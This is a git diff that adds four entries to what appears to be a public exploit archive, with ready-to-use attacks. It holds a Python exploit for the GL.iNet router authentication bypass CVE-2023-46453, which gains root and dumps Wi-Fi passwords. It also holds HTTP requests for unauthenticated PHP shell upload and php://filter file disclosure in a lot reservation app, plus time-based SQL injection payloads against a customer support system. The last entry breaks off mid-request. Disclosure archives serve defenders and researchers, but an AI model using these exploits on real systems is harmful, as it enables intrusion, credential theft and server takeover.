diff --git a/exploits/hardware/webapps/51865.py b/exploits/hardware/webapps/51865.py new file mode 100755 index 000000000..762718880 --- /dev/null +++ b/exploits/hardware/webapps/51865.py @@ -0,0 +1,275 @@ +DZONERZY Security Research + +GLiNet: Router Authentication Bypass + +======================================================================== +Contents +======================================================================== + +1. Overview +2. Detailed Description +3. Exploit +4. Timeline + +======================================================================== +1. Overview +======================================================================== + +CVE-2023-46453 is a remote authentication bypass vulnerability in the web +interface of GLiNet routers running firmware versions 4.x and up. The +vulnerability allows an attacker to bypass authentication and gain access +to the router's web interface. + +======================================================================== +2. Detailed Description +======================================================================== + +The vulnerability is caused by a lack of proper authentication checks in +/usr/sbin/gl-ngx-session file. The file is responsible for authenticating +users to the web interface. The authentication is in different stages. + +Stage 1: + +During the first stage the user send a request to the challenge rcp +endpoint. The endpoint returns a random nonce value used later in the +authentication process. + +Stage 2: + +During the second stage the user sends a request to the login rcp endpoint +with the username and the encrypted password. The encrypted password is +calculated by the following formula: + +md5(username + crypt(password) + nonce) + +The crypt function is the standard unix crypt function. + +The vulnerability lies in the fact that the username is not sanitized +properly before being passed to the login_test function in the lua script. + +------------------------------------------------------------------------ +local function login_test(username, hash) + if not username or username == "" then return false end + + for l in io.lines("/etc/shadow") do + local pw = l:match('^' .. username .. ':([^:]+)') + if pw then + for nonce in pairs(nonces) do + if utils.md5(table.concat({username, pw, nonce}, ":")) == +hash then + nonces[nonce] = nil + nonce_cnt = nonce_cnt - 1 + return true + end + end + return false + end + end + + return false +end +------------------------------------------------------------------------ + +This script check the username against the /etc/shadow file. If the username +is found in the file the script will extract the password hash and compare +it to the hash sent by the user. If the hashes match the user is +authenticated. + +The issue is that the username is not sanitized properly before being +concatenated with the regex. This allows an attacker to inject a regex into +the username field and modify the final behavior of the regex. + +for instance, the following username will match the userid of the root user: + +root:[^:]+:[^:]+ will become root:[^:]+:[^:]+:([^:]+) + + +This will match the "root:" string and then any character until the next ":" +character. This will cause the script skip the password and return the +user id instead. + +Since the user id of the root user is always 0, the script will always +return: + +md5("root:[^:]+:[^:]+" + "0" + nonce) + +Since this value is always the same, the attacker can simply send the known +hash value to the login rcp endpoint and gain access to the web interface. + +Anyway this approach won't work as expected since later in the code inside +the +this check appear: + +------------------------------------------------------------------------ + local aclgroup = db.get_acl_by_username(username) + + local sid = utils.generate_id(32) + + sessions[sid] = { + username = username, + aclgroup = aclgroup, + timeout = time_now() + session_timeout + } +------------------------------------------------------------------------ + +The username which is now our custom regex will be passed to the +get_acl_by_username +function. This function will check the username against a database and +return the aclgroup associated with the username. +If the username is not found in the database the function will return nil, +thus causing attack to fail. + +By checking the code we can see that the get_acl_by_username function is +actually appending our raw string to a query and then executing it. +This means that we can inject a sql query into the username field and +make it return a valid aclgroup. + +------------------------------------------------------------------------ +M.get_acl_by_username = function(username) + if username == "root" then return "root" end + + local db = sqlite3.open(DB) + local sql = string.format("SELECT acl FROM account WHERE username = +'%s'", username) + + local aclgroup = "" + + for a in db:rows(sql) do + aclgroup = a[1] + end + + db:close() + + return aclgroup +end +------------------------------------------------------------------------ + +Using this payload we were able to craft a username which is both a valid +regex and a valid sql query: + +roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+ + +this will make the sql query become: + +SELECT acl FROM account WHERE username = 'roo[^'union selecT +char(114,111,111,116)--]:[^:]+:[^:]+' + +which will return the aclgroup of the root user (root). + +======================================================================== +3. Exploit +======================================================================== + +------------------------------------------------------------------------ +# Exploit Title: [CVE-2023-46453] GL.iNet - Authentication Bypass +# Date: 18/10/2023 +# Exploit Author: Daniele 'dzonerzy' Linguaglossa +# Vendor Homepage: https://www.gl-inet.com/ +# Vulnerable Devices: +# GL.iNet GL-MT3000 (4.3.7) +# GL.iNet GL-AR300M(4.3.7) +# GL.iNet GL-B1300 (4.3.7) +# GL.iNet GL-AX1800 (4.3.7) +# GL.iNet GL-AR750S (4.3.7) +# GL.iNet GL-MT2500 (4.3.7) +# GL.iNet GL-AXT1800 (4.3.7) +# GL.iNet GL-X3000 (4.3.7) +# GL.iNet GL-SFT1200 (4.3.7) +# And many more... +# Version: 4.3.7 +# Firmware Release Date: 2023/09/13 +# CVE: CVE-2023-46453 + +from urllib.parse import urlparse +import requests +import hashlib +import random +import sys + + +def exploit(url): + try: + requests.packages.urllib3.disable_warnings() + host = urlparse(url) + url = f"{host.scheme}://{host.netloc}/rpc" + print(f"[*] Target: {url}") + print("[*] Retrieving nonce...") + nonce = requests.post(url, verify=False, json={ + "jsonrpc": "2.0", + "id": random.randint(1000, 9999), + "method": "challenge", + "params": {"username": "root"} + }, timeout=5).json() + if "result" in nonce and "nonce" in nonce["result"]: + print(f"[*] Got nonce: {nonce['result']['nonce']} !") + else: + print("[!] Nonce not found, exiting... :(") + sys.exit(1) + print("[*] Retrieving authentication token for root...") + md5_hash = hashlib.md5() + md5_hash.update( + f"roo[^'union selecT +char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode()) + password = md5_hash.hexdigest() + token = requests.post(url, verify=False, json={ + "jsonrpc": "2.0", + "id": random.randint(1000, 9999), + "method": "login", + "params": { + "username": f"roo[^'union selecT +char(114,111,111,116)--]:[^:]+:[^:]+", + "hash": password + } + }, timeout=5).json() + if "result" in token and "sid" in token["result"]: + print(f"[*] Got token: {token['result']['sid']} !") + else: + print("[!] Token not found, exiting... :(") + sys.exit(1) + print("[*] Checking if we are root...") + check = requests.post(url, verify=False, json={ + "jsonrpc": "2.0", + "id": random.randint(1000, 9999), + "method": "call", + "params": [token["result"]["sid"], "system", "get_status", {}] + }, timeout=5).json() + if "result" in check and "wifi" in check["result"]: + print("[*] We are authenticated as root! :)") + print("[*] Below some info:") + for wifi in check["result"]["wifi"]: + print(f"[*] --------------------") + print(f"[*] SSID: {wifi['ssid']}") + print(f"[*] Password: {wifi['passwd']}") + print(f"[*] Band: {wifi['band']}") + print(f"[*] --------------------") + else: + print("[!] Something went wrong, exiting... :(") + sys.exit(1) + except requests.exceptions.Timeout: + print("[!] Timeout error, exiting... :(") + sys.exit(1) + except KeyboardInterrupt: + print(f"[!] Something went wrong: {e}") + + +if __name__ == "__main__": + print("GL.iNet Auth Bypass\n") + if len(sys.argv) < 2: + print( + f"Usage: python3 {sys.argv[1]} https://target.com", +file=sys.stderr) + sys.exit(0) + else: + exploit(sys.argv[1]) +------------------------------------------------------------------------ + +======================================================================== +4. Timeline +======================================================================== + +2023/09/13 - Vulnerability discovered +2023/09/14 - CVE-2023-46453 requested +2023/09/20 - Vendor contacted +2023/09/20 - Vendor replied +2023/09/30 - CVE-2023-46453 assigned +2023/11/08 - Vulnerability patched and fix released \ No newline at end of file diff --git a/exploits/php/webapps/51860.txt b/exploits/php/webapps/51860.txt new file mode 100644 index 000000000..ed3e11055 --- /dev/null +++ b/exploits/php/webapps/51860.txt @@ -0,0 +1,67 @@ +# Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution +# Google Dork: N/A +# Date: 10th December 2023 +# Exploit Author: Elijah Mandila Syoyi +# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip +# Version: 1.0 +# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 +# CVE : N/A + +Developer description about application purpose:- + +------------------------------------------------------------------------------------------------------------------------------------------------------------------ +About + +The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots. + +------------------------------------------------------------------------------------------------------------------------------------------------------------------ + + +Vulnerability:- + +The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server. + + + +Proof of Concept:- + +(HTTP POST Request) + +POST /lot/admin/ajax.php?action=save_division HTTP/1.1 +Host: 192.168.150.228 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027 +Content-Length: 606 +Origin: http://192.168.150.228 +Connection: close +Referer: http://192.168.150.228/lot/admin/index.php?page=divisions + + +-----------------------------217984066236596965684247013027 +Content-Disposition: form-data; name="id" + + +-----------------------------217984066236596965684247013027 +Content-Disposition: form-data; name="name" + +sample +-----------------------------217984066236596965684247013027 +Content-Disposition: form-data; name="description" + +sample +-----------------------------217984066236596965684247013027 +Content-Disposition: form-data; name="img"; filename="phpinfo.php" +Content-Type: application/x-php + + + +-----------------------------217984066236596965684247013027-- + + + +Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address. \ No newline at end of file diff --git a/exploits/php/webapps/51861.txt b/exploits/php/webapps/51861.txt new file mode 100644 index 000000000..568b751ee --- /dev/null +++ b/exploits/php/webapps/51861.txt @@ -0,0 +1,75 @@ +# Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability +# Google Dork: N/A +# Date: 10th December 2023 +# Exploit Author: Elijah Mandila Syoyi +# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip +# Version: 1.0 +# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0 +# CVE : N/A + +Developer description about application purpose:- + +------------------------------------------------------------------------------------------------------------------------------------------------------------------ +About + +The Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots. + +------------------------------------------------------------------------------------------------------------------------------------------------------------------ + + +Vulnerability:- + +The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario. + + + +Proof of Concept:- + +(HTTP POST Request) + +GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1 +Host: 192.168.150.228 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Referer: http://192.168.150.228/lot/ +Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9sn +Upgrade-Insecure-Requests: 1 + + +The same can be achieved by removing the PHPSESSID cookie as below:- + + +GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1 +Host: 192.168.150.228 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Referer: http://192.168.150.228/lot/ +Upgrade-Insecure-Requests: 1 + + + +The file requested will be returned in base64 format in returned HTTP response. + +The attack can also be used to traverse directories to return files outside the web root. + + + +GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1 +Host: 192.168.150.228 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Referer: http://192.168.150.228/lot/ +Upgrade-Insecure-Requests: 1 + + +This will return test.php file in the D:\ directory. \ No newline at end of file diff --git a/exploits/php/webapps/51862.txt b/exploits/php/webapps/51862.txt new file mode 100644 index 000000000..abbd7e287 --- /dev/null +++ b/exploits/php/webapps/51862.txt @@ -0,0 +1,69 @@ +# Exploit Title: Customer Support System 1.0 - Multiple SQL injection +vulnerabilities +# Date: 15/12/2023 +# Exploit Author: Geraldo Alcantara +# Vendor Homepage: +https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html +# Software Link: +https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Windows +# CVE : CVE-2023-50071 +*Description*: Multiple SQL injection vulnerabilities in +/customer_support/ajax.php?action=save_ticket in Customer Support +System 1.0 allow authenticated attackers to execute arbitrary SQL +commands via department_id, customer_id and subject.*Payload*: +'+(select*from(select(sleep(20)))a)+' +*Steps to reproduce*: + +1- Log in to the application. + +2- Navigate to the page /customer_support/index.php?page=new_ticket. + +3- Create a new ticket and insert a malicious payload into one of the +following parameters: department_id, customer_id, or subject. +*Request:* +POST /customer_support/ajax.php?action=save_ticket HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) +Gecko/20100101 Firefox/120.0 +Accept: */* +Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate, br +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; +boundary=---------------------------81419250823331111993422505835 +Content-Length: 853 +Origin: http://192.168.68.148 +Connection: close +Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket +Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; +sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; +PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l + +-----------------------------81419250823331111993422505835 +Content-Disposition: form-data; name="id" + + +-----------------------------81419250823331111993422505835 +Content-Disposition: form-data; name="subject" + +teste'+(select*from(select(sleep(5)))a)+' +-----------------------------81419250823331111993422505835 +Content-Disposition: form-data; name="customer_id" + +3 +-----------------------------81419250823331111993422505835 +Content-Disposition: form-data; name="department_id" + +4 +-----------------------------81419250823331111993422505835 +Content-Disposition: form-data; name="description" + +
Blahs